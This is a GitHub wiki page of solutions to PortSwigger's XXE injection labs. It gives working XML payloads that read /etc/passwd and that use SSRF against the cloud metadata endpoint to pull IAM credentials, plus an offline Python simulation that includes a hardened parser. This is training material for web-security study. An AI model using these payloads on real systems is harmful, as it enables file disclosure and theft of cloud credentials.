XML external entity (XXE) injection - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Exploiting XXE using external entities to retrieve files

  • Solution

    1. Browse an item and check stock.
    2. Observe the requests made. There is a POST request handling XML data.
    3. Reformat the body (for example with tidy -xml -q) and edit the request so the DTD declares an external entity that points at the target file and the entity is referenced inside productId, as shown below.
      <?xml version="1.0" encoding="utf-8"?>
      <!DOCTYPE anything [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
      <stockCheck>
      <productId>1&xxe;</productId>
      <storeId>1</storeId>
      </stockCheck>
    4. Send the request. The lab echoes the product ID back in its "Invalid product ID" error, so the expanded entity, i.e. the contents of /etc/passwd, appears in the response body.

Apprentice lab:
Exploiting XXE to perform SSRF attacks

  • Solution

    1. Browse an item and check stock.
    2. Observe the requests made. There is a POST request handling XML data.
    3. Reformat the body (for example with tidy -xml -q) and edit the request so the DTD declares an external entity whose SYSTEM identifier is the internal metadata URL, and reference it inside productId, as shown below. The parser fetches the URL on the server's behalf, which is the SSRF.
      <?xml version="1.0" encoding="utf-8"?>
      <!DOCTYPE anything [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
      <stockCheck>
      <productId>&xxe;</productId>
      <storeId>1</storeId>
      </stockCheck>
    4. The response echoes the fetched content, which is a listing naming the next path segment. Append that segment to the URL in the DTD and resend, repeating until you reach /latest/meta-data/iam/security-credentials/admin, whose response contains the IAM credentials.
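The mechanism behind both labs above (a DTD declares an external entity, the parser fetches its SYSTEM identifier, the fetched text lands in an element the application echoes) as an added example; this is not code from the wiki or from PortSwigger. It builds a small parser on Python's standard-library expat binding that resolves external entities the way the vulnerable back end does, puts a hardened variant that refuses DTDs beside it, and automates step 4 of the SSRF lab with a loop. The fake filesystem, the fake metadata listings, the resolver and the credential values are constructed stand-ins so the script runs offline.

```python
"""Added example (not from the wiki or PortSwigger): an XXE-capable parser on
Python's stdlib expat binding, a hardened variant, and the SSRF walk."""
import re
import xml.parsers.expat as expat

# Constructed stand-ins (assumptions, not captured data).
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "carlos:x:1001:1001::/home/carlos:/bin/sh\n",
}
META = "http://169.254.169.254/"
FAKE_HTTP = {  # each listing names the next path segment
    META: "latest/",
    META + "latest/": "meta-data/",
    META + "latest/meta-data/": "iam/",
    META + "latest/meta-data/iam/": "security-credentials/",
    META + "latest/meta-data/iam/security-credentials/": "admin",
    META + "latest/meta-data/iam/security-credentials/admin":
        '{"AccessKeyId": "CONSTRUCTED", "SecretAccessKey": "CONSTRUCTED"}',
}


def fake_resolver(system_id):
    """What a real parser does with a SYSTEM identifier: fetch it. file://
    reads the fake filesystem; http:// hits the fake metadata service, which
    is the SSRF of the second lab."""
    if system_id.startswith("file://"):
        return FAKE_FS[system_id[len("file://"):]]
    if system_id in FAKE_HTTP:
        return FAKE_HTTP[system_id]
    raise LookupError("no stand-in for " + system_id)


def build_payload(entity_uri, prefix=""):
    """The stock-check body from the labs: a DTD declaring entity xxe,
    referenced inside <productId> (prefix="1" reproduces 1&xxe;)."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE anything [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        "<stockCheck>\n"
        "<productId>%s&xxe;</productId>\n"
        "<storeId>1</storeId>\n"
        "</stockCheck>\n"
    ) % (entity_uri, prefix)


def _collect_text(parser, element):
    """Install handlers that gather the character data of one element."""
    chunks, path = [], []
    parser.StartElementHandler = lambda name, attrs: path.append(name)
    parser.EndElementHandler = lambda name: path.pop()

    def chars(data):
        if path and path[-1] == element:
            chunks.append(data)
    parser.CharacterDataHandler = chars
    return chunks


def product_id_vulnerable(xml_text, resolver=fake_resolver):
    """Parse like a back end that resolves external entities: &xxe; becomes
    whatever the SYSTEM identifier fetches, and that text ends up in
    <productId>, which the lab then echoes in its error message."""
    parser = expat.ParserCreate()
    chunks = _collect_text(parser, "productId")

    def external_entity(context, base, system_id, public_id):
        # The child parser inherits the handlers above, so the fetched text
        # reaches chars() exactly as if it were written in the document.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(resolver(system_id), True)
        return 1
    parser.ExternalEntityRefHandler = external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks)


def product_id_hardened(xml_text):
    """Same parser with DTDs refused outright (the usual fix): no entity
    declarations, hence no file read and no SSRF. Raises ValueError on any
    DOCTYPE, otherwise returns the <productId> text."""
    parser = expat.ParserCreate()
    chunks = _collect_text(parser, "productId")

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE declarations are not accepted")
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(xml_text, True)
    return "".join(chunks)


def walk_metadata(start_url, fetch):
    """Step 4 of the SSRF lab, automated: while the echoed response is a bare
    path segment, append it and resend. Returns (final_url, body)."""
    url = start_url
    while True:
        body = fetch(url)
        if not re.fullmatch(r"[\w.-]+/?", body.strip()):
            return url, body
        url += body.strip()


if __name__ == "__main__":
    print(product_id_vulnerable(build_payload("file:///etc/passwd", "1")))
    print(*walk_metadata(META, lambda u: product_id_vulnerable(build_payload(u))))
```

Against a real target, fetch would send the crafted body over HTTP and return the echoed product ID; here it routes the payload through the vulnerable parser so the whole chain (entity declaration, resolution, reflection, iteration) is visible in one process. The hardened variant rejects the DOCTYPE before any entity is declared, which is the behaviour to look for when testing whether a fix is complete.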

Blind XXE

Practitioner lab:
Blind XXE with out-of-band interaction (Pro)


Practitioner lab:
Blind XXE with out-of-band interaction via XML parameter entities (Pro)


Practitioner lab:
Exploiting blind XXE to exfiltrate data using a malicious external DTD (Pro)

